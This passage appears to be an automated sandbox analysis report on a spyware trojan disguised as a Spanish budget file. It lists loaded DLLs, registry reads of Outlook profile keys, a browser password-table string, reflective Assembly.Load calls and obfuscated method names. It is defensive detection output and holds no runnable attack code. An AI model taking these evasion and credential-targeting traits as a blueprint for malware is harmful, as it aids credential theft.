                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, hG1k6rSWR9qjxqoKi3.csSecurity API names: _0020.AddAccessRule
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, v5FPWYwF5Lu3OYj8hh.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.ba20000.5.raw.unpack, hG1k6rSWR9qjxqoKi3.csSecurity API names: _0020.SetAccessControl
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.ba20000.5.raw.unpack, hG1k6rSWR9qjxqoKi3.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.ba20000.5.raw.unpack, hG1k6rSWR9qjxqoKi3.csSecurity API names: _0020.AddAccessRule
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/1@4/3
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PRESUPUESTO DE NOVIEMBRE...exe.logJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeMutant created: NULL
                      Source: PRESUPUESTO DE NOVIEMBRE...exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: PRESUPUESTO DE NOVIEMBRE...exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.000000000339E000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.000000000338E000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.00000000033D1000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.00000000033AC000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.00000000033DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: PRESUPUESTO DE NOVIEMBRE...exeReversingLabs: Detection: 44%
                      Source: unknownProcess created: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe "C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe"
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess created: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe "C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe"
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess created: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe "C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe"Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: PRESUPUESTO DE NOVIEMBRE...exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: PRESUPUESTO DE NOVIEMBRE...exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: PRESUPUESTO DE NOVIEMBRE...exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: agpG.pdb source: PRESUPUESTO DE NOVIEMBRE...exe
                      Source: Binary string: agpG.pdbSHA256 source: PRESUPUESTO DE NOVIEMBRE...exe

                      Data Obfuscation

                      barindex
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.3f95ad0.0.raw.unpack, XlF5VlCIHRSQX8M5eh.cs.Net Code: _200C_200C_202D_206C_200B_206A_206D_200B_200D_200C_202D_206A_206D_202A_206A_206B_202B_206C_202D_200B_202E_202B_202A_206C_206A_206D_202D_206B_206D_206B_200D_202B_202D_206C_206F_206C_200B_202B_206A_206D_202E System.Reflection.Assembly.Load(byte[])
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, hG1k6rSWR9qjxqoKi3.cs.Net Code: CbaHO3vLtX System.Reflection.Assembly.Load(byte[])
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, hG1k6rSWR9qjxqoKi3.cs.Net Code: CbaHO3vLtX System.Reflection.Assembly.Load(byte[])
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.77d0000.4.raw.unpack, XlF5VlCIHRSQX8M5eh.cs.Net Code: _200C_200C_202D_206C_200B_206A_206D_200B_200D_200C_202D_206A_206D_202A_206A_206B_202B_206C_202D_200B_202E_202B_202A_206C_206A_206D_202D_206B_206D_206B_200D_202B_202D_206C_206F_206C_200B_202B_206A_206D_202E System.Reflection.Assembly.Load(byte[])
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.ba20000.5.raw.unpack, hG1k6rSWR9qjxqoKi3.cs.Net Code: CbaHO3vLtX System.Reflection.Assembly.Load(byte[])
                      Source: PRESUPUESTO DE NOVIEMBRE...exeStatic PE information: section name: .text entropy: 7.689072386621162
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, LDPRSJGgPioyLZLCT7.csHigh entropy of concatenated method names: 'xWvJ9XfMEW', 'QK0JiDJrv4', 'Y9MJ4aRfc2', 'HXp4LybpA8', 'Ttj4zFao43', 'BDfJqK7HiM', 'gV0JjJ3uwC', 'K8sJ7bOpvh', 'smPJFv38yZ', 'bHHJHBjjXx'
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, uwtT01JgcZ4fKYmM8Q.csHigh entropy of concatenated method names: 'igwjJJ4CfA', 'GAcjIxaOe1', 'EwhjAhK9sN', 'wYCjloABjv', 'FX1jEFp4F5', 'gGDjGNHPqY', 'inbaQhK0S5JS5xdLtb', 'aci52l6h3b8miuF4lx', 'eZnjjiPw0O', 'jaBjFHHQ3V'
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, AjLLXvPnxqDOKZj9sl.csHigh entropy of concatenated method names: 'xBuJ6mentO', 'Ge6JZ77eqY', 'GLsJOdGYEM', 'Ts2Jk3Q6Bo', 'o1rJaoDVtE', 'afJJoHqLET', 'iI4JWLAIUT', 'dObJeWHsPD', 'THnJgtMFGr', 'CREJMMe37E'
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, BXlHBTaRVjup4cv1U4n.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'hBBDvC5cQQ', 'hCZDbINhse', 'e8JDSBx1WF', 'z3IDrEj6aF', 'WDbDnuJwng', 'biwDQqUToq', 'usLDT2Xxbg'
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, jo15ypF8Q2d5FhhOFS.csHigh entropy of concatenated method names: 'zVM4230l31', 'DtQ4pDmSpd', 'GDD4Uon7pP', 'rgs4JD73jQ', 'SSc4I8D0Nn', 'LTEUnTPiOo', 'WGOUQFteqt', 'fK9UThpYIw', 'e5KU5hElWW', 'eAsUN6XIle'
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, Kc46Hf8ITrxAA4lPXA.csHigh entropy of concatenated method names: 'Dispose', 'WYojNL3Kdj', 'O6S7hlJJZ4', 'm4QttvhWTl', 'UrNjLA24rN', 'O6rjzM5Pig', 'ProcessDialogKey', 'GRS7qclFlY', 'gXA7jQSNix', 'SSq77QVr9O'
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, VGK4IuDs0UIkZWMV1c.csHigh entropy of concatenated method names: 'aW3x0stNrl', 'QGlxh8qMRY', 'gNFxR4Lw0H', 'ixnxCRawk0', 'JaWxvlpmnc', 'rAHxYdPryk', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, rtay8k4GxqYUPWc6TA.csHigh entropy of concatenated method names: 'Autx9U4Bpu', 'tMKxp9aHLD', 'BBOxijKcVv', 'fCUxUpIh2u', 'n6Px4AbsYi', 'JOGxJa3Qck', 'HnpxIHYaYj', 'V6qxXbgbuM', 'tbBxAwUgh6', 'VlpxlZI9JL'
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, jhecFsQYUfZHa1955Q.csHigh entropy of concatenated method names: 'DnPm5duM96', 'WOimLoBDsZ', 't3WxqOErIY', 'Sv2xjSGcwU', 'BeLmuMm3kG', 'Vj8myAsBxb', 'nGwmcFGqis', 'U27mvTkP3Y', 'tcMmblmJOj', 'YAVmScHGMw'
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, v5FPWYwF5Lu3OYj8hh.csHigh entropy of concatenated method names: 'SUQpvMGCjC', 'FxCpbIUuiI', 'ASopStxVhh', 'YjYpr4Q1NU', 'FuLpngb8cP', 'O8WpQc6e4r', 't3KpTtd8nP', 'fbhp5XFQcR', 'sdapNHPmuB', 'H0ipLiOUyX'
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, effcpNldddjUekj7Kr.csHigh entropy of concatenated method names: 'LC5Otrg9m', 'nLXkfJRnk', 'suQoC2II3', 'w0LW839uS', 'QBsgEQ2wh', 'lx0M4wFTi', 'UVuiLPeJMgZQHA1VZt', 'kvwHH8OSbt0P9X40Kd', 'owVBLHw3CbxtP7EuC7', 'c2NxdZNRA'
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, lTjvuTj46f0WeeYZxc.csHigh entropy of concatenated method names: 'cPQfeqhjt1', 'nxZfgmioh1', 'oGGf0TKtDl', 'cV1fhvugv9', 'pHSfC83crn', 'GkwfYdTUBE', 'VPTf3q92eT', 'zSgfK85i6a', 'ROWfVLOOdU', 'E8lfu4RD3S'
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, XJe3MayUM75Qt4S8HX.csHigh entropy of concatenated method names: 'ToString', 'eOPGu9PmYs', 'C17Ghdqg5W', 't2BGRYyULa', 'UdkGCMQ0CY', 'kxXGYlXM1U', 'TFgGPwSYUr', 'lA7G3Z59KS', 'FsfGK7MSOT', 'K2TGwCeV6L'
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, r2gPona6djD4Y2Uy7Gs.csHigh entropy of concatenated method names: 'd0g86Nbmtr', 'QTW8ZO2eKo', 'bqI8O0r0fF', 'upl8kFUv31', 'UZD8akkjKf', 'Dwh8oZvvyn', 'yZ58WuGqnw', 'C9G8e1cyng', 'Gxv8gG59kQ', 'uuD8M7e27r'
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, FbgDLHLo8mv2DHccjX.csHigh entropy of concatenated method names: 'YywikghXLJ', 'nJViomyTOn', 'CeEieCAXfD', 'AkvigR0YsY', 'fISiE8ISyP', 'xUxiGjVY4U', 'kh4imhdm7e', 'kiyixjkblp', 'Gy4i8fH3KM', 'mrpiDap3jL'
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, nrl7IZhXFOrSCsYjvM.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'bUj7N18GqR', 'hnI7LStjV9', 'O2y7zVs7dm', 'WDwFq8ab3y', 'MfZFjL78er', 'G8CF7N34EY', 'MjXFFF6mq2', 'FPKLALjhPkTcp3uunQg'
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, hG1k6rSWR9qjxqoKi3.csHigh entropy of concatenated method names: 'dwtF2fEfX8', 'rWKF9ccnYn', 'uEQFpQPssV', 'mwKFiwSbqB', 'epWFUwWIdb', 'qnAF41gs2Z', 'VR4FJ4sLhM', 'BO9FIDjXoj', 'GHUFXJ1MIg', 'q0JFA7wndr'
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, HRGrkx7cr8Ehxg8ycc.csHigh entropy of concatenated method names: 'am38jtBrKN', 'HMy8FOPw6h', 'Y0B8HtKh9x', 'Kb089MnbSi', 'dyh8pAMZEi', 'H6w8UiFiSr', 'XoT8444lyq', 'L0HxTyOoYk', 'zZbx5KjFna', 'Sy3xN1l6gK'
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, OZdrLdz96Gdlyr8xOp.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'UTe8fZvjUi', 'F398Ew4dxD', 'QOo8G5MsNO', 'hFg8m4ryXr', 'goF8xcC0nA', 'NhP88yOqpx', 'SWT8DWxB0A'
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, Exsot2flOn7wu6T8a3.csHigh entropy of concatenated method names: 'nUPUaq828h', 'GOoUWOpKVu', 'joliRtk93y', 'fqliCDx0Y9', 'OIJiY3apLX', 'WnniPD7rJe', 'lQ7i3467Ta', 'e3hiKxyMVf', 'Rswiw4UDuK', 'HowiVo0fhE'
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, LDPRSJGgPioyLZLCT7.csHigh entropy of concatenated method names: 'xWvJ9XfMEW', 'QK0JiDJrv4', 'Y9MJ4aRfc2', 'HXp4LybpA8', 'Ttj4zFao43', 'BDfJqK7HiM', 'gV0JjJ3uwC', 'K8sJ7bOpvh', 'smPJFv38yZ', 'bHHJHBjjXx'
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, uwtT01JgcZ4fKYmM8Q.csHigh entropy of concatenated method names: 'igwjJJ4CfA', 'GAcjIxaOe1', 'EwhjAhK9sN', 'wYCjloABjv', 'FX1jEFp4F5', 'gGDjGNHPqY', 'inbaQhK0S5JS5xdLtb', 'aci52l6h3b8miuF4lx', 'eZnjjiPw0O', 'jaBjFHHQ3V'
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, AjLLXvPnxqDOKZj9sl.csHigh entropy of concatenated method names: 'xBuJ6mentO', 'Ge6JZ77eqY', 'GLsJOdGYEM', 'Ts2Jk3Q6Bo', 'o1rJaoDVtE', 'afJJoHqLET', 'iI4JWLAIUT', 'dObJeWHsPD', 'THnJgtMFGr', 'CREJMMe37E'
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, BXlHBTaRVjup4cv1U4n.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'hBBDvC5cQQ', 'hCZDbINhse', 'e8JDSBx1WF', 'z3IDrEj6aF', 'WDbDnuJwng', 'biwDQqUToq', 'usLDT2Xxbg'
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, jo15ypF8Q2d5FhhOFS.csHigh entropy of concatenated method names: 'zVM4230l31', 'DtQ4pDmSpd', 'GDD4Uon7pP', 'rgs4JD73jQ', 'SSc4I8D0Nn', 'LTEUnTPiOo', 'WGOUQFteqt', 'fK9UThpYIw', 'e5KU5hElWW', 'eAsUN6XIle'
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, Kc46Hf8ITrxAA4lPXA.csHigh entropy of concatenated method names: 'Dispose', 'WYojNL3Kdj', 'O6S7hlJJZ4', 'm4QttvhWTl', 'UrNjLA24rN', 'O6rjzM5Pig', 'ProcessDialogKey', 'GRS7qclFlY', 'gXA7jQSNix', 'SSq77QVr9O'
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, VGK4IuDs0UIkZWMV1c.csHigh entropy of concatenated method names: 'aW3x0stNrl', 'QGlxh8qMRY', 'gNFxR4Lw0H', 'ixnxCRawk0', 'JaWxvlpmnc', 'rAHxYdPryk', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, rtay8k4GxqYUPWc6TA.csHigh entropy of concatenated method names: 'Autx9U4Bpu', 'tMKxp9aHLD', 'BBOxijKcVv', 'fCUxUpIh2u', 'n6Px4AbsYi', 'JOGxJa3Qck', 'HnpxIHYaYj', 'V6qxXbgbuM', 'tbBxAwUgh6', 'VlpxlZI9JL'
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, jhecFsQYUfZHa1955Q.csHigh entropy of concatenated method names: 'DnPm5duM96', 'WOimLoBDsZ', 't3WxqOErIY', 'Sv2xjSGcwU', 'BeLmuMm3kG', 'Vj8myAsBxb', 'nGwmcFGqis', 'U27mvTkP3Y', 'tcMmblmJOj', 'YAVmScHGMw'
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, v5FPWYwF5Lu3OYj8hh.csHigh entropy of concatenated method names: 'SUQpvMGCjC', 'FxCpbIUuiI', 'ASopStxVhh', 'YjYpr4Q1NU', 'FuLpngb8cP', 'O8WpQc6e4r', 't3KpTtd8nP', 'fbhp5XFQcR', 'sdapNHPmuB', 'H0ipLiOUyX'
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, effcpNldddjUekj7Kr.csHigh entropy of concatenated method names: 'LC5Otrg9m', 'nLXkfJRnk', 'suQoC2II3', 'w0LW839uS', 'QBsgEQ2wh', 'lx0M4wFTi', 'UVuiLPeJMgZQHA1VZt', 'kvwHH8OSbt0P9X40Kd', 'owVBLHw3CbxtP7EuC7', 'c2NxdZNRA'
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, lTjvuTj46f0WeeYZxc.csHigh entropy of concatenated method names: 'cPQfeqhjt1', 'nxZfgmioh1', 'oGGf0TKtDl', 'cV1fhvugv9', 'pHSfC83crn', 'GkwfYdTUBE', 'VPTf3q92eT', 'zSgfK85i6a', 'ROWfVLOOdU', 'E8lfu4RD3S'
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, XJe3MayUM75Qt4S8HX.csHigh entropy of concatenated method names: 'ToString', 'eOPGu9PmYs', 'C17Ghdqg5W', 't2BGRYyULa', 'UdkGCMQ0CY', 'kxXGYlXM1U', 'TFgGPwSYUr', 'lA7G3Z59KS', 'FsfGK7MSOT', 'K2TGwCeV6L'
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, r2gPona6djD4Y2Uy7Gs.csHigh entropy of concatenated method names: 'd0g86Nbmtr', 'QTW8ZO2eKo', 'bqI8O0r0fF', 'upl8kFUv31', 'UZD8akkjKf', 'Dwh8oZvvyn', 'yZ58WuGqnw', 'C9G8e1cyng', 'Gxv8gG59kQ', 'uuD8M7e27r'
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, FbgDLHLo8mv2DHccjX.csHigh entropy of concatenated method names: 'YywikghXLJ', 'nJViomyTOn', 'CeEieCAXfD', 'AkvigR0YsY', 'fISiE8ISyP', 'xUxiGjVY4U', 'kh4imhdm7e', 'kiyixjkblp', 'Gy4i8fH3KM', 'mrpiDap3jL'
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, nrl7IZhXFOrSCsYjvM.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'bUj7N18GqR', 'hnI7LStjV9', 'O2y7zVs7dm', 'WDwFq8ab3y', 'MfZFjL78er', 'G8CF7N34EY', 'MjXFFF6mq2', 'FPKLALjhPkTcp3uunQg'
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, hG1k6rSWR9qjxqoKi3.csHigh entropy of concatenated method names: 'dwtF2fEfX8', 'rWKF9ccnYn', 'uEQFpQPssV', 'mwKFiwSbqB', 'epWFUwWIdb', 'qnAF41gs2Z', 'VR4FJ4sLhM', 'BO9FIDjXoj', 'GHUFXJ1MIg', 'q0JFA7wndr'
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, HRGrkx7cr8Ehxg8ycc.csHigh entropy of concatenated method names: 'am38jtBrKN', 'HMy8FOPw6h', 'Y0B8HtKh9x', 'Kb089MnbSi', 'dyh8pAMZEi', 'H6w8UiFiSr', 'XoT8444lyq', 'L0HxTyOoYk', 'zZbx5KjFna', 'Sy3xN1l6gK'
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, OZdrLdz96Gdlyr8xOp.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'UTe8fZvjUi', 'F398Ew4dxD', 'QOo8G5MsNO', 'hFg8m4ryXr', 'goF8xcC0nA', 'NhP88yOqpx', 'SWT8DWxB0A'
